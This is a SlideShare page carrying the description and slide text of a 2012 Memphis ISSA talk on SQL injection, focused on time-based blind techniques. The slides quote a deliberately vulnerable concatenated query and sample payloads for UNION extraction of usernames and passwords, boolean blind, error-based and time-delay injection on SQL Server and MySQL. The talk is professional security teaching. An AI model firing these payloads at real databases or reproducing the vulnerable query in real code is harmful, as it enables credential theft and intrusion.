Your SlideShare is downloading. ×
Time-Based Blind SQL Injection
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×

Introducing the official SlideShare app

Stunning, full-screen experience for iPhone and Android

Text the download link to your phone

Standard text messaging rates apply

Time-Based Blind SQL Injection

6,074
views

Published on

This presentation was given at the November 2012 chapter meeting of the Memphis ISSA. In the presentation, I discuss various methods of exploiting common SQL Injection vulnerabilities, as well as …

This presentation was given at the November 2012 chapter meeting of the Memphis ISSA. In the presentation, I discuss various methods of exploiting common SQL Injection vulnerabilities, as well as present a specialized technique known as Time-Based Blind SQL Injection. Related to the latter, I give a scenario in which other common forms of SQL Injection would fail to produce results for a penetration tester or attacker, and show how one may overcome this situation by using the specialized technique. The scenario given, along with the sample code, is NOT a contrived example, but instead is closely based on a real-world application that I encountered as part of an assessment.

A live demonstration of the common forms of SQL Injection was also given which utilized the OWASP Broken Web Apps VM, DVWA, Burp Proxy and SQL Power Injector. To demo a real-world time-based blind injection, I created and locally hosted a new application which closely mimicked the real-world application mentioned above.


0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
6,074
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
84
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. TIME-BASED BLIND SQL INJECTIONMatt Presson (@matt_presson)Memphis ISSANovember 2012
  • 2. WHO AM I? Sr. Information Security Analyst Focus:  Application Security  Database Security  Mobile Security
  • 3. OBJECTIVE Quick introduction to SQL Injection Four main types of SQL Injection Time-based + Blind A likely scenario DEMOs
  • 4. INTRO TO SQL INJECTION
  • 5. DEFINITION“SQL injection is an attack in which malicious codeis inserted into strings that are later passed to [adatabase] for parsing and execution.”“The primary form of SQL injection consists ofdirect insertion of code into user-input variablesthat are concatenated with SQL commands andexecuted.”Source: http://msdn.microsoft.com/en-us/library/ms161953(v=sql.105).aspx
  • 6. SAMPLE VULNERABLE CODEvar _shipCity = Request.form("ShipCity");var sql = "select * from OrdersTable" + " where ShipCity = " + "" + _shipCity + "";Source: http://msdn.microsoft.com/en-us/library/ms161953(v=sql.105).aspx
  • 7. CATEGORIES OF SQL INJECTION Normal  UNION queries Blind  Boolean expressions Error-based  Valid syntax that throws exceptions Time-based  Resource intensive or sleep-style queries
  • 8. EXAMPLES – NORMAL INJECTIONvar sql = "select ShipCity, Dest from Orders" + " where ShipCity = "+_shipCity+"";Inject: UNION <data you want to extract> -- -Example:select ShipCity, Dest from Orders whereShipCity= UNION select Username, Passwordfrom Users -- -
  • 9. EXAMPLES – BLIND INJECTIONvar sql = "select * from Orders" + " where ShipCity = "+_shipCity+"";Inject: <valid value> and <positive expression> <valid value> and <negative expression>Example:select * from Orders where ShipCity=Memphisand 1=1
  • 10. EXAMPLES – ERROR-BASED INJECTIONvar sql = "select * from Orders" + " where ShipCity = "+_shipCity+"";Example (SQL Server):select * from Orders where ShipCity= and1=CAST(suser_name() as INT)-- -Example (MySQL):select * from Orders where ShipCity= andExtractValue(0,CONCAT(0x5c,(select user())))-- -
  • 11. EXAMPLES – TIME-BASED INJECTIONvar sql = "select ShipCity, Dest from Orders" + " where ShipCity = "+_shipCity+"";Example (SQL Server):select ShipCity, Dest from Orders whereShipCity= waitfor delay 0:0:10Example (MySQL >= 5.0.12):select ShipCity, Dest from Orders whereShipCity= UNION SELECT SLEEP(5), 2
  • 12. TIME-BASED + BLINDSame:  Resource intensive or sleep/wait style functionsNew:  Extract arbitrary data  Bypass business functionality
  • 13. EXAMPLES – TIME-BASED + BLINDvar sql = "select ShipCity, Dest from Orders" + " where ShipCity = "+_shipCity+"";Example (SQL Server):select ShipCity, Dest from Orders whereShipCity=; if(<boolean>) waitfor delay 0:0:10Example (MySQL >= 5.0.12):select ShipCity, Dest from Orders whereShipCity= UNIONSELECT IF(<bool>,SLEEP(5),1), 2
  • 14. SCENARIO
  • 15. DEMOS